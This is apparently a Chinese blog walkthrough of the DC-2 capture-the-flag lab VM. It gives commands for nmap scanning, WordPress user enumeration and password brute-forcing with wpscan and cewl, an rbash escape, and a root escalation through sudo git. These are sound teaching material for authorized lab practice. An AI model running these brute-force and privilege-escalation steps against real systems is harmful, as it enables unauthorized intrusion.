靶机下载地址放在文章最后啦
一、靶机的搭建
1.打开文件夹右击使用VM虚拟机打开
2.给虚拟机取个名字(我这里就直接DC-2),选择自己虚拟机存放的位置
3.如果遇到这个问题直接点击重试即可
4.等待虚拟机的导入
5.虚拟机网络默认的桥接模式,直接开启虚拟机即可
6.靶场的登录界面(不知道密码和账号)
二、渗透过程
1.直接上nmap扫一下存活的IP地址
我这里IP地址有点多,204这台机子应该就是DC-2靶机IP了
nmap -sV -p- 192.168.2.0/24
2.再用nmap扫一下开放的端口
nmap -sV -p- 192.168.2.204
3.发现只开放了 80http和7744ssh两个端口,先访问80端口看看
http://192.168.2.204
4.在这里访问了很久,跳转到这个界面,现在我们需要修改hosts文件
su root
vim /etc/hosts
5.进入hosts文件,把域名和IP地址添加进去
192.168.2.204 dc-2
6.再次访问dc-2,发现成功进入到网站,并获取到一个flag
http://dc-2/
7.flag1翻译:
你通常的单词表可能不起作用,所以,也许你只需要使用cewl。
密码越多越好,但有时你无法赢得所有密码。
以一个身份登录以查看下一个flag。
如果找不到,请以其他身份登录。
8.我们先用dirsearch扫一下网站的目录看看,我们发现了wp的后台管理登录界面。
dirsearch -u http://dc-2/
9.在flag1说到我们需要使用cewl来生成密码字典。
cewl http://dc-2/ -w passwd.txt
10.使用 wpscan穷举 WordPress 网站中注册过的用户名,来制作用户名字典。
wpscan -url http://dc-2/ -e u
11.我们发现了三个用户名,把他制作成用户名字典。
12.再使用wpscan对后台进行爆破,成功爆破出两个用户名和密码。
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
13.使用jerry用户登录看看,登录成功。
14.我们到处点点看,在pages里面发现flag2。
15.flag2翻译
如果你不能利用WordPress并采取快捷方式,还有另一种方法。 希望你找到了另一个切入点。
16.我们最初用nmap扫描时发现还开放一个7744ssh端口,我们尝试使用jerry账户来连接ssh ,发现连接失败。
17.再用tom来连接,发现连接成功。
ssh tom@192.168.2.204 -p 7744
18.whoami一下查看一下当前的权限,发现rbash,在ls看看里面的文件flag3.
19.用cat发现打开不了,又使用vim也还是不行,最后用vi成功打开了。
120.flag3翻译
可怜的汤姆总是追着杰瑞跑,也许他应该他应该为自己创造成所以的压力和道歉。
21.我们发现flag3里面有su,和翻译的那一句话,我们应该绕过rbash切换到jerry用户上去。
BASH_CMDS[su]=/bin/sh
su
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
whoami
22.切换到jerry
su jerry
23.尝试用jerry用户找一下flag4
24.flag4翻译
很高兴看到你已经走到了这一步——但你还没有回家。 您仍然需要获得最终标志(唯一真正重要的flag!!!) 这里没有任何提示——你现在就靠你自己了。 继续 - 离开这里!!!!
25.现在我们是jerry用户,应该需要我们提权到root用户,使用sudo -l提权一下,发现不行,我们看到可以使用git提权。
sudo -l
26.使用git提权
sudo git -p help config
!/bin/sh
whoami一下是root用户提权成功
27.用root用户找一下最后的flag,最后在根目录里root文件夹里找到的flag
记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我
后台回复"DC-2"即可获得靶场地址
有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。